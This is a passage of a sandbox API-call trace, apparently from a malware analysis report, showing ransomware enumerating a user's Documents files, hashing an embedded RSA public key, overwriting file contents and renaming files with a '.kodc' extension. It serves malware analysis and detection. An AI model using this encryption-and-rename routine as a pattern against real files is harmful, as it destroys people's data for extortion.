hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abb0 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab98 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab68 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab50 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d5b8 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.752] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x10258, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x10258, lpOverlapped=0x0) returned 1 [0098.752] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.752] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1025d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.752] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.753] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.753] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.753] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.753] CloseHandle (hObject=0x5cc) returned 1 [0098.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.755] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u-aMqijoSKbxYaw.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u-amqijoskbxyaw.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u-aMqijoSKbxYaw.doc.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u-amqijoskbxyaw.doc.kodc")) returned 1 [0098.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.756] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.758] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97037f60, ftCreationTime.dwHighDateTime=0x1d5b8c3, ftLastAccessTime.dwLowDateTime=0xba666c60, ftLastAccessTime.dwHighDateTime=0x1d5b693, ftLastWriteTime.dwLowDateTime=0xba666c60, ftLastWriteTime.dwHighDateTime=0x1d5b693, nFileSizeHigh=0x0, nFileSizeLow=0x61b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uaM-Oex8lfdXTvedwu.odp", cAlternateFileName="UAM-OE~1.ODP")) returned 1 [0098.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.758] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uaM-Oex8lfdXTvedwu.odp") returned=".odp" [0098.758] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uaM-Oex8lfdXTvedwu.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uam-oex8lfdxtvedwu.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.758] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=25012) returned 1 [0098.758] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.761] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x618e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.761] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.762] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.762] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.762] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x61b4, lpOverlapped=0x0) returned 1 [0098.762] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.762] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.762] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.762] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.762] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.763] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.763] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.763] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.763] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.763] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.763] GetLastError () returned 0x0 [0098.764] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.764] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.764] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.764] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.764] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x61b0) returned 0x9ba4d90 [0098.764] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.764] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d5b8 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab50 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d600 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab68 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab98 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abb0 [0098.764] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.765] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab98 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abb0 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331abb0 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ab98 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.765] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331abb0 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab98 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.765] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.766] GetCurrentThreadId () returned 0x42c [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f6b8 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.766] GetCurrentThreadId () returned 0x42c [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.766] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab98 [0098.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331abb0 [0098.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab80 [0098.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.767] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.767] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.768] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x61b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.768] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.768] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.768] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.768] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.768] CloseHandle (hObject=0x5cc) returned 1 [0098.774] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uaM-Oex8lfdXTvedwu.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uam-oex8lfdxtvedwu.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uaM-Oex8lfdXTvedwu.odp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uam-oex8lfdxtvedwu.odp.kodc")) returned 1 [0098.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.778] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.779] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb209ea20, ftCreationTime.dwHighDateTime=0x1d5a1e3, 